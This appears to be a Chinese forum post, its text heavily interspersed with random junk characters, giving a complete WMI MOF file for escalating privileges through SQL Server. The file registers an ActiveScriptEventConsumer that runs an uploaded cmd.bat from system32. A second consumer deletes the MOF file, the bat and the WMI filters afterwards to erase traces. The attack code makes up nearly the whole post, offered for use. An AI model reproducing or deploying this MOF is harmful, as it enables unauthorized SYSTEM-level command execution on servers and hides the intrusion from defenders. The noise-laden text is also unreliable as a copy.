这个sql提权MOF需要运行 system下的文件,不能定义路径。; H9 V6 y! ]+ n1 f( p
需要将要运行的命令写入到bat上传到system32目录,然后执行。
4 X7 s n5 e0 _( Y# u; b
* t. N# J, C2 L2 V2 f这个sql提权MOF需要运行 system下的文件,不能定义路径。
* S) [2 x+ \* Z/ y+ o( q5 k7 X需要将要运行的命令写入到bat上传到system32目录,然后执行。& t9 ~. T% q+ c% C8 [! k
% J( }# |" t3 Q! h2 C#pragma
' x9 |0 t, G; c+ `3 A i namespace("\\\\.\\root\\cimv2"). H; o$ G/ V( v
class
: i2 d) P2 [; _2 n* y$ |! b MyClass547: n6 T: {# S: ]- m7 s V
{ [key]
: g( Q8 @1 x, o8 V string# L5 w S) A. v k% \8 h
Name;
$ Y1 F# {9 r% C& W; j };$ k3 J; n6 Q- n( V5 N2 z% ^8 G
class
* y( a/ s, a7 E$ l ActiveScriptEventConsumer
9 ]) P5 i+ ?0 d0 `0 E6 |" p : __EventConsumer { [key]( f4 q( e- I5 L
string6 x: v- w- u/ o3 j: B+ o. O0 m/ m
Name; [not_null]2 @6 k7 ^/ E M* g. {( N
string
) }" o4 z% B; M# B ScriptingEngine; string1 u4 N, X3 T8 r
ScriptFileName; [template]
l& S* Z5 u4 b# z3 `$ q6 T8 o string
* M& Y& r# M+ P2 _7 H8 i9 Q ScriptText; uint32 KillTimeout;, ?6 T# Q0 |4 u" _( E- w( F
}; instance of __Win32Provider as $P {
! J9 I# _! G G6 }. Q Name
4 }. |/ V! s9 Y9 n$ J ?4 o4 m- e =
% r k- y1 C! Q- B4 i1 m: h1 ~ "ActiveScriptEventConsumer"; CLSID =
; w( }6 v& K$ W6 f2 a "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";3 `0 b; I& ?8 _2 A' B& g6 c( q1 O
PerUserInitialization+ E! }. S% F R2 ~0 n: u
= TRUE;3 O1 t- c% _; N$ v. Q
}; instance of __EventConsumerProviderRegistration { Provider5 F" x, Z+ M! _) U. T, V2 p
= $P; ConsumerClassNames
! ~ {. L* f, D# D* e3 Q% ] =
5 }" S# T; l; ~) z' w$ F0 }, c' t {"ActiveScriptEventConsumer"};6 X2 R; B1 t# B7 A! Z6 v: a
};+ l3 v5 Q/ T, D& e# R6 V: I- u; v
Instance of ActiveScriptEventConsumer" A0 d1 X' X$ S. g, E" H9 j
as $cons { Name; {2 @" w6 I( b7 z. q
=
! G! ` i( a: x1 v: P* ?, e "ASEC"; ScriptingEngine; [, n" C4 @( K( y3 J6 p1 i
=
: W7 F: D/ \6 x- d! X A "JScript"; ScriptText) Z" j7 ]/ d1 J+ a4 U8 D" ~" }/ T$ q" V
=
" O- c# e" K1 y8 e "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };5 O' W6 O, I1 R6 J/ ~: G% A
Instance of ActiveScriptEventConsumer
8 v5 F8 F" m, w: ~5 o as $cons2 { Name
% k2 @* J5 \3 B$ Y% z4 |9 X =
/ d* T( T) B& r" ^3 j "qndASEC"; ScriptingEngine+ q0 z2 F u0 [- q" \" T$ Y4 q: s
=
! W y* I6 T7 E. g" l& W "JScript"; ScriptText7 N. N+ s$ U) }9 i- v
=
% _9 D- X; T y/ z1 X% g "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
5 |# p" J% a# P2 l3 @ }; instance of __EventFilter as $Filt { Name
% w. Q2 t/ `+ j =9 k4 k2 q% s6 X0 _& M
"instfilt"; Query8 X3 V- I# m' g) }
=1 f9 X( {5 `" w9 R6 b% ?- u# J
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage/ \' M* ]# u7 Q$ Z, D5 S* c/ B8 [
=9 @" V" B7 D5 Z
"WQL"; }; instance of __EventFilter as $Filt2 { Name( }3 ]5 {2 l' L+ T& D# I' p% I4 I% x4 G
=* ?; Y5 m* q: y N
"qndfilt"; Query
; p5 ?) d* C7 Y) G( N =
* p! G2 v: |- K+ D "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
" d' M0 O, ^4 h: n# e$ P3 t' d, ~ =8 B6 D0 G$ n6 e% Q: @2 O
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer. l4 b0 o+ Q& @% l' h: W; M
= $cons; Filter
/ N# X3 r+ z0 S = $Filt;
2 Q0 P+ _& H3 T }; instance of __FilterToConsumerBinding as $bind2 { Consumer& c/ l9 P% V3 j( F6 }% g
= $cons2; Filter N# ~4 J& P& e1 N9 P) ? M Z
= $Filt2;& \6 {& x+ ^8 Q m! S
}; instance of MyClass547
* A, O, w% [' P as $MyClass { Name/ B& K5 i! [' ?2 F
=! O* _& t% a' ~9 H0 |; m& {7 B0 B
"ClassConsumer";, q. y6 ^* F" K( K) X
}; |